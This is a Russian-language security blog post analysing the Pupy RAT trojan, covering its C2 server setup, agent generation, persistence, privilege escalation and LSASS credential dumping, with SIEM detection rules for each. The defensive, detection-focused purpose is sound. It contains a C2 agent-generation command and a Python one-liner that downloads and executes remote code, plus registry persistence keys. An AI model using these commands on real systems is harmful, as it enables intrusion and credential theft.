Pupy Rat — возможности Open Source трояна

Привет, Хабр!

Меня зовут Борис Нестеров, я аналитик-исследователь угроз кибербезопасности в компании R-Vision. Сегодня я хочу рассказать о трояне Pupy Rat, и его модификациях Decoy Dog. Pupy Rat распространяется с помощью социальной инженерии или доставляется в инфраструктуру после компрометации одного из узлов и активно используется хакерскими группировками в атаках на российские компании. По данным различных источников, по меньшей мере 48 российских организаций в разных отраслях экономики пострадали от действий этого трояна. Об этом можно узнать из новостей на сайтах TheHackerNews, CisoClub, а также из других источников.

Давайте подробнее рассмотрим инструмент Pupy и его наиболее интересные функции. Кроме того, мы обсудим способы обнаружения его использования. 

Обзор PupyRat

Pupy RAT — это кроссплатформенное, многофункциональное вредоносное ПО для удаленного доступа к узлу «Жертвы». Инструмент используется для постэксплуатации и написан в основном на Python версии 2. Однако некоторые его функции реализованы с помощью библиотек, созданных на языках программирования C и Go.

Этот инструмент работает по принципу «всё в памяти» и почти не оставляет следов в системе, а также имеет множество функций, перечисленных в репозитории GitHub.

В Pupy Rat поддерживаются различные способы соединения, которые называются launcher:

• connect — соединение клиента до сервера;

• bind — это когда удаленный клиент ожидает подключения от сервера управления.

• auto_proxy — автоматически выбирает установленную конфигурацию прокси на целевом хосте и осуществляет подключение через него;

• dnscnc — использование протокола DNS для передачи данных.

Наиболее необычным лаунчером является dnscnc. Он позволяет клиенту взаимодействовать с командным сервером через DNS-туннелирование.

Рассмотрим пример на изображении ниже. Здесь скомпрометированный хост отправляет в запросе информацию о системе в виде закодированной строки Base64, разделенной знаком -. Поскольку в DNS-запросе нельзя использовать символ =, который используется алгоритмом для заполнения блока, этот символ заменяется на _.

Pupy Rat использует свой алгоритм кодирования полезной нагрузки. Он приведен в файле dns_encoder.py. и основывается на преобразованиях данных по алгоритму Хаффмана с использованием таблицы кодирования dns_encoder_table.py.

Использование DNS-туннелирования атакующими можно обнаружить путем подсчета количества уникальных запросов к одному родительскому домену.

Под спойлером приведён фрагмент кода детектирующего правила. В этом фрагменте для подсчёта уникальных DNS-запросов используется объект «Активный список», который хранит статистику по различным доменам.

aliases:   DNSEvent:     filter: !vrl |       # Установленный триггер уникальных запросов к домену до наступления корреляционного события        TRIGGER_COUNT = 50       isPossibleDNSTunneling = false       isExcludeDomain = false       # Список исключений для легальных доменов доменов        excludeDomain = ["domain.local"]       queryName = to_string(.cs1) ?? ""       host = to_string(.dvchost) ?? ""       queryNameList = split(queryName,".",limit: 2)       payload = to_string(queryNameList[0])       parentDomain = queryNameList[1]       for_each(excludeDomain) -> |_index, value| {         if ( parentDomain == value){           isExcludeDomain = true         }       }       if (!isExcludeDomain) {         dns_query = get_active_record("dns_queries_count",{"domain": parentDomain, "host": host}) ?? {}         if (dns_query == null) {           res, err = add_active_record("dns_queries_count", {"domain": parentDomain, "host": host, "unique" : payload ,"count": 1})         } else {           unique_list = to_string(dns_query.unique) ?? ""            if (!contains(unique_list, payload)) {             dnsRequestCount = (to_int(dns_query.count) ?? 0) + 1             res, err = add_active_record("dns_queries_count", {"domain": parentDomain,"host": host, "unique" : join([unique_list,payload],separator: ";") ?? "",  "count": dnsRequestCount})             if (dnsRequestCount == TRIGGER_COUNT) {               isPossibleDNSTunneling = true             }                        }         }       }       isPossibleDNSTunneling 

После ознакомления с основными особенностями инструмента можем перейти к установке сервера.

Развертывание PupyRat

Установка сервера

Чтобы развернуть сервер управления, вы можете обратиться к инструкции, которая представлена в репозитории Pupy Rat в разделе Wiki. Сервер написан на Python 2 и имеет множество зависимостей в виде устаревших библиотек установка которых может стать нетривиальной задачей. Однако есть более простой способ — использовать готовый Docker образ для развёртывания сервера.

Инструкция по развертыванию сервера в контейнере Docker, а также docker-compose файл доступны в репозитории Github.

Сервер Pupy Rat поддерживает различные способы передачи данных, называемые транспортами. Их список приведен в документации.

По умолчанию, после запуска сервера Pupy Rat, доступны только SSL-соединения. Для использования нового транспорта на сервере поднимается listen. Для добавления дополнительного listen на сервере Pupy Rat требуется выполнить команду:

listen -a {{Имя транспорта}}

Теперь, когда сервер управления запущен, мы можем сгенерировать клиенты и подключить их.

Запуск агента на целевом хосте

Pupy Rat предлагает широкий выбор клиентов для самых популярных архитектур и операционных систем. Чтобы создать нового клиента, можно воспользоваться командой gen или скриптом pupygen.py.

На рисунке показан пример создания агента в виде бинарного исполняемого файла для операционной системы Windows с архитектурой x64. Этот агент использует транспорт obfs3 (протокол для обфускации трафика, активно используется в сетях Tor).

Pupy Rat поддерживает различные виды клиентских агентов: client , py , pyinst , ps1, ps1_oneliner, rubber_ducky , csharp.NET , .NET_oneliner .

Для генерации py_oneliner клиента, использующего транспорт http и самостоятельно инициирующего соединение к серверу для получения управляющих команд, можем выполнить команду в консоли запущенного сервера:

gen -f py_oneliner -O linux -A x64 connect --host 10.10.10.10:9000 -t http

Сгенерированный клиент py_oneliner выглядит в виде строки Python кода:

python2.7 -c 'import urllib;exec urllib.urlopen("http://10.10.10.10:9000/SEU0v9YFfK/mkI4vvlhEe").read()'

Где:

• http://10.10.10.10 — адрес, на котором запущен сервер Papy Rat.

• SEU0v9YFfK — идентификатор сервера, который генерируется при запуске сервера. mkI4vvlhEe — идентификатор payload, который создается при каждой генерации нового клиента.

• Payload, сгенерированный с типом py_oneliner, может использоваться в операционной системе Linux и Windows на неограниченном количестве клиентов.
  Данный payload достаточно выполнить на удаленном клиенте с установленным интерпретатором python версии 2.7.

  При запуске клиента py_oneliner загружается с сервера Papy Rat и исполняется обфусцированный Python-скрипт. Загрузка осуществляется в память, в связи с чем не остается следов в файловой системе.

  При этом при выполнении команды в логе auditd фиксируется событие системного вызова execve , где в полях a0...an фиксируется выполненная команда (после нормализации в R-Vision SIEM значение данных полей записывается в поле cmd).

При запуске скрипта на устройстве с операционной системой Windows фиксируется событие с EventID 4688 (Process Creation) журнала Security и с EventID 1 (Process Creation) журнала Sysmon/Operational:

Запуск скрипта можно детектировать по вхождению в поле cmd значений python или py, а также использования функции urlopen библиотеки urllib. Такие события являются триггером в правилах R-Vision SIEM.

В результате работы правил мы получим оповещение в R-Vision SIEM.

Теперь, когда наш клиент сгенерирован и запущен, мы можем рассмотреть, как им управлять.

Управление клиентами

После подключения клиента к серверу он появляется в списке sessions:

Pupy Rat предоставляет возможность управления как всеми агентами одновременно, так и по отдельности. Для выбора активного агента используется команда:

sessions -i <id session>

Активный агент подсвечивается в меню sessions более ярко.

Выполнение команд на агенте доступно через команду run:

run {{команда}}

Функционал проведения атак

Сторонние фреймворки

Pupy Rat — это удобный C2-сервер, который включает в себя различные инструменты от сторонних разработчиков. Для его работы используются внешние зависимости:

• PowerSploit — набор PowerShell инструментов. В Pupy Rat представлен двумя скриптами:  Invoke-ReflectivePEInjection и PowerView. Invoke-ReflectivePEInjection используется для загрузки исполняемого файла dll в процесс PowerShell.

• WinPwnage — это инструмент для операционных систем семейства Windows, который позволяет выполнять методы обхода UAC, повышения привилегий и закрепления.
  Использование инструмента в Pupy подробнее рассмотрим ниже.

• LaZagne — это приложение, используемое для получения паролей, хранящихся на локальном компьютере. Пример применения приложения представим ниже.

• linux-exploit-suggester — скрипт на языке shell для поиска потенциальных уязвимостей в операционной системе Unix и соответствующих им эксплойтов.

• winpty — это программный пакет для Windows, предоставляющий интерфейс, похожий на Unix pty-master, для связи с консольными программами Windows.

• memorpy — утилита позволяет искать и изменять данные процессов, загруженных в память, с использованием библиотеки ctypes. Поддерживается операционная система Windows, Linux, MacOS.

• mimipy — утилита для дампа паролей из памяти различных процессов.

• inveigh — проводит спуфинг-атаки и захват хэшей/учетных данных как с помощью анализа пакетов, так и с помощью специфичных для протокола сокетов.

• pyopus — кодек для интерактивной передачи речи и звука через Интернет. wesng — утилита поиска уязвимостей, основанная на выводе systeminfo.

• injector — библиотека для внедрения кода в исполняемой области процесса. Работает с OS Windows, Linux, MacOS.

Функционал фреймворков невозможно описать в рамках одной статьи. Однако мы рассмотрим наиболее распространённые методы, которые используют злоумышленники для получения и расширения привилегий в Pupy Rat.

Закрепление через ключи реестра

Для закрепления в системе при помощи реестра используется инструмент WinPwnage.

Для его удобного использования Pupy Rat предоставляет модуль persistence.

Для закрепления через реестр используются следующие ключи реестра:

• Ключ UserInit

• HKCU run key

• HKLM run key

• Ключ DebugPath приложения Cortana

• Ключ DebugPath приложения People

Вы можете обнаружить попытки закрепления через реестр с помощью R-Vision SIEM. Для этого следует использовать правило «Закрепление в системе путём изменения ключей автозапуска в реестре», которое выполняет детект через событие RegistryEvent (Value Set) EventID 13 журнала Sysmon/Operational.

На рисунке ниже представлены нормализованные события, связанные с изменением ключей реестра, которые могут указывать на попытки закрепления.

В нормализованном событии в поле filePath помещается измененный ключ реестра, а в поле cs4 — устанавливаемое значение ключа.

Под спойлером вы найдёте фрагмент кода, который отвечает за детектирование закрепления через реестр. В секции aliases проверяется, есть ли изменённый ключ реестра в списке ключей, которые используются для закрепления. Если такое соответствие найдено, то генерируется корреляционное событие.

filter: !vrl |   .dvendor == "Microsoft" &&    # Фильтруем событие изменения реестра Sysmon на установление значения реестра   (.externalId == "13")  aliases:   modifty_reg:       filter: !vrl |       # Ключи реестра используемые для закрепления Pupy       # Оргинальное правило содержит более 130 различных ключей реестра которые могут применяться для закрпепления       registry_run_keys = [               "\\\\software\\\\wow6432node\\\\microsoft\\\\windows nt\\\\currentversion\\\\image file execution options",         "\\\\software\\\\microsoft\\\\windows nt\\\\currentversion\\\\image file execution options",         "\\\\software\\\\microsoft\\\\windows nt\\\\currentversion\\\\winlogon\\\\userinit",         "\\\\software\\\\wow6432node\\\\microsoft\\\\windows\\\\currentversion\\\\run",         "\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run"       ]       # Список исключений процессов легитимно использующих реестр для автозапуска        exclude_process_list =["\\\\microsoft\\\\edge\\\\application\\\\msedge.exe","\\\\windows\\\\system32\\\\sihost.exe"]       isPersistence = false       isExcludeProcess = false       filePath = downcase(to_string(.filePath) ?? "")       dproc = downcase(to_string(.dproc) ?? "")       # Проверка соответсвия списку исключений       for_each(exclude_process_list) -> |_index, value| {         if ends_with(dproc, value){           isExcludeProcess = true         }       }        if (isExcludeProcess != true) {         for_each(registry_run_keys) -> |_index, value| {           if contains(filePath, value){             isPersistence = true           }         }       }              # Ключ реестра DebugPath приложения People (полный путь отличается в зависимости от версии поэтому вынесен в отдельную проверку)       if (contains_all(filePath, ["\\\\activatableclasses\\\\package\\\\microsoft.people_", "debuginformation", "debugpath"])) {         isPersistence = true       }         # Ключ реестра DebugPath приложения Cortana (полный путь отличается в зависимости от версии поэтому вынесен в отдельную проверку)       if (contains_all(filePath, ["\\\\activatableclasses\\\\package\\\\microsoft.windows.cortana_", "debuginformation", "debugpath"])) {         isPersistence = true       }          isPersistence && !isExcludeProcess    

Закрепление через создание сервиса

Pupy Rat поддерживает метод закрепления при помощи Windows Service (метод 12 модуля persistence). Этот метод закрепления можно детектировать, используя событие с EventID 4697 (A service was installed in the system) журнала Security. Фрагмент события создания сервиса в формате JSON из RQL-песочницы в R-Vision SIEM:

Имя сервиса записывается в значении поля destinationServiceName, параметры выполнения в значении поля filePath. Поля suser, sntdom, shost помогают локализовать событие по пользователю и хосту.

О данном событии SIEM-система оповестит благодаря корреляционному правилу «Создан сервис с подозрительными параметрами». В правиле проверяется наличие подозрительных параметров при создании сервиса, например, содержащие cmd.exe или rundll32.exe. Под спойлером приведен фрагмент правила на языке VRL:

# фильтрация событий 4697 журнала Security filter: !vrl |   .dvendor == "Microsoft" &&   .externalId == "4697"  aliases:   install_service:     filter: !vrl |       isSuspect = false         # функция math_any проверяет вхождение в соответсвии с регулярным выраженим. Все шаблоны проверяются за один проход по целевой строке, что дает потенциальное преимущество в производительности.       if match_any(to_string(downcase(.filePath) ?? "-"),           [r'powershell',           r'%comspec%', r'echo+.+\\pipe\\', r'^cmd\s', r'cmd\.exe',           r'\\temp',           r'\\tmp', r'\%temp\%', r'\%tmp\%', r'admin$',           r'\\users\\\\public\\',           r'\\appdata\\', r'\\perflogs\\',r`rundll32\.exe`]) {             isSuspect = true }       isSuspect

Закрепление через записи автозагрузки XDG (Linux)

Для операционных систем семейства Linux Pupy Rat использует метод создания конфигурационного файла XDG в директории /home/{{username}}/.config/autostart/, который маскируется под сервис dbus.

Ниже представлен фрагмент кода, отвечающий за создание конфигурационного файла демона dbus. Описание кода представлено в качестве комментариев на рисунке ниже:

При создании конфигурационного файла генерируется событие auditd с системным вызовом openat (открытие файла) и с правами на запись в файл в директории autostat:

R-Vision SIEM зафиксирует закрепление благодаря правилу «Закрепление с использованием записей автозагрузки XDG», фрагмент которого приведен на рисунке:

Правило отслеживает добавление или изменение конфигурационных файлов по путям /.config/autostart и /etc/xdg/autostart на основе системного вызова openat. Полный код правила под спойлером.

id: 6afd1a7c-95d9-43b9-94d8-e4ef38451eca name: Закрепление в системе с использованием записей автозагрузки XDG  version: 1.0.0 date: 2024-06-11 author: Nesterov Boris, R-Vision status: stable type: correlation_rule severity: medium  description: Атакующие могут добавлять или изменять XDG Autostart Entries              (записи автозагрузки XDG) для выполнения вредоносных программ              или команд при входе пользователя в систему. XDG Autostart entries              используют файлы .desktop для настройки окружающей среды пользователя              и определяют какие приложения должны запускаться при входе              пользователя. Правило детектирует создание и изменение файлов              в директориях, где по умолчанию содержатся записи автозагрузки.              В случае сработки правила рекомендуется проверить ПО, указанное в              параметре Exec измененного или созданного конфигурационного файла.          tags:   - linux   - Persistence   - Privilege Escalation   - attack.T1547   - attack.T1547.013  data_source:   - Linux     - auditd       - openat     - R-Point       - object-access    known_false_positives:   - "Использование файлов .desktop в директории XDG autostart администраторами системы для автозапуска приложений"   - "Установка программного обеспечения, использующего записи XDG для автозапуска"  filter: !vrl |   .dvendor == "Linux" &&   .cat == "OA"  aliases:   oa_autostart:     filter: !vrl |       filePath = downcase(to_string(.filePath) ?? "-")       (contains(filePath, ".config/autostart") ||       contains(filePath, "/etc/xdg/autostart")) &&       .filePermission == "w" &&       contains(filePath, ".desktop")  select:   alias: oa_autostart  throttle_time_sec: 10  ttl: 10  on_correlate: !vrl |     .dvchost = to_string(%oa_autostart.dvchost) ?? "-"     .duser = to_string(%oa_autostart.duser) ?? "-"     .suser = to_string(%oa_autostart.suser) ?? "-"     .dproc = to_string(%oa_autostart.dproc) ?? "-"     .filePath = to_string(%oa_autostart.filePath) ?? "-"     .cmd = to_string(%oa_autostart.cmd) ?? "-"     .msg = join(["На хосте", .dvchost, "пользователь", .suser, "изменил или создал файл", .filePath, ", что может быть признаком закрепления в системе через запись XDG"], " ") ?? ""

Повышение привилегий при помощи именованных каналов

Для повышения привилегий в системах с ОС семейства Windows используется инструмент WinPwnage. Данный инструмент позволяет повысить привилегии за счет Named Pipes. В данном методе создается именованный канал от несистемного пользователя, затем происходит подключение пользователя к нему уже с системными правами. Факт создания именного канала регистрируется в событии Pipe created EventID 17 журнала Sysmon/Operational, а подключение фиксируется в событии Pipe connected EventID 18.

Под спойлером приведен фрагмент правила «Кража токена доступа при помощи именованных каналов» в R-Vision SIEM, детектирующего данную активность.

filter: !vrl |   .dvendor == "Microsoft" &&   includes(["17", "18"], .externalId)  aliases:   event17:     filter: !vrl |       .externalId == "17" &&       (downcase(to_string(.suser) ?? "") != "system" && downcase(to_string(.sntdom) ?? "") != "nt authority")   event18:     filter: !vrl |       .externalId == "18" &&       (downcase(to_string(.suser) ?? "") == "system" && downcase(to_string(.sntdom) ?? "") == "nt authority")      select:   alias: event17   join:      alias: event18     on:       - eq: {event17: .dvchost, event18: .dvchost}       - eq: {event17: .cs6, event18: .cs6} 

Дамп учетных данных из lsass

Для получения сохранённых учетных данных Pupy Rat использует инструмент LaZagne. Проект LaZagne — это приложение с открытым исходным кодом, используемое для получения списка паролей, хранящихся на локальном компьютере. Инструмент интерпретируется в памяти, не касаясь диска, и он работает на хостах под управлением Windows и Linux. Пример результата работы инструмента:

Инструмент LaZagne использует для доступа к учетным данным функцию MiniDumpWriteDump из библиотеки dbghelp.dll (метод через comsvcs.dll), которая характерна маской доступа «0×1478» к процессу lsass.exe. Данная маска доступа образовывается в результате суммирования в шестнадцатеричном виде исходных масок для ниже представленных прав:

PROCESS_QUERY_LIMITED_INFORMATION PROCESS_DUP_HANDLE PROCESS_QUERY_INFORMATION PROCESS_VM_OPERATION PROCESS_VM_WRITE PROCESS_VM_READ

Для вызова функции MiniDumpWriteDump необходимы права PROCESS_QUERY_INFORMATION и PROCESS_VM_READ. Обращение к памяти процесса lsass.exe  регистрируется в событии ProcessAccess EventID 10 журнала Sysmon/Operational. R-Vision SIEM создает оповещение об этом благодаря правилу «Подозрительный доступ к памяти процесса LSASS (Sysmon)».

Правило обрабатывает событие обращения к процессу lsass.exe. В событии проверяется окончание маски доступа, характерной для чтения памяти процесса. В спойлере приведен фрагмент правила на языке VRL:

filter: !vrl |   .dvendor == "Microsoft" &&    (.externalId == "10" &&     { dproc = downcase(to_string(.dproc) ?? "-");         if contains(dproc, "lsass.exe")            { true } else { false } })  aliases:   event:     filter: !vrl |           isEXCEPT = true           isACCESSorUNKNOWN = false           accessMask = downcase(to_string(.accessMask) ?? "-");           oldFilePath = downcase(to_string(.oldFilePath) ?? "-");           dproc = downcase(to_string(.dproc) ?? "-");           sproc = downcase(to_string(.sproc) ?? "-");           #все уникальные окончания масок доступа, которые может содержать PROCESS_VM_READ           access_list = [              "10", "11", "12","13", "18", "19", "1a", "1b", "30", "31", "32", "33", "38", "39", "3a", "3b", "50", "51", "52", "53", "58", "59", "5a", "5b", "70", "71", "72", "73", "78", "79", "7a", "7b", "90", "91", "92", "93", "98", "99", "9a", "9b", "b0", "b1", "b2", "b3", "b8", "b9", "ba", "bb", "d0", "d1",  "d2", "d3", "d8", "d9", "da", "db", "f0", "f1", "f2", "f3", "f8", "f9", "fa", "fb", "ff",           ]           exceptions_list = [ #список исключений для процессов в нижнем регистре               ":\\\\program files (x86)\\\\ossec-agent\\\\wazuh-agent.exe",               ":\\\\windows\\\\sysmon64.exe",               ":\\\\windows\\\\system32\\\\csrss.exe",               ":\\\\windows\\\\system32\\\\wininit.exe",               ":\\\\windows\\\\system32\\\\svchost.exe",               ":\\\\windows\\\\system32\\\\msiexec.exe",               ":\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe",               ":\\\\program files (x86)\\\\kaspersky lab\\\\kes.12.3.0\\\\avp.exe",               ":\\\\program files (x86)\\\\kaspersky lab\\\\networkagent\\\\vapm.exe",               ":\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe",           ]               for_each(access_list) -> |_index, value| {               if ends_with(accessMask, value) {                   isACCESSorUNKNOWN = true               }           }                for_each(exceptions_list) -> |_index, value| {               if contains(sproc, value) {                   isEXCEPT = false                }               }           isACCESSorUNKNOWN &&            isEXCEPT 

Заключение

В статье мы рассмотрели возможности вредоносного ПО Pupy Rat. Размещение исходного кода в публичном доступе делает этот инструмент доступным для модификации и использования широкому кругу лиц. Так хакеры активно используют в атаках на российские компании модификацию Decoy Dog. Модификация инструмента и применяемые различные способы обфускации помогают обходить статические методы антивирусных решений.

Также анализ показывает, что детектировать использование инструмента можно, отслеживая его воздействие на систему в журналах событий. Задачи по анализу событий с различных источников и получению оперативных оповещений о подозрительной и вредоносной активности может решить продукт R-Vision SIEM, который поставляется с пакетом экспертизы.

Всем спасибо за внимание, буду рад обсудить и ответить на вопросы в комментариях!

MITRE TTPs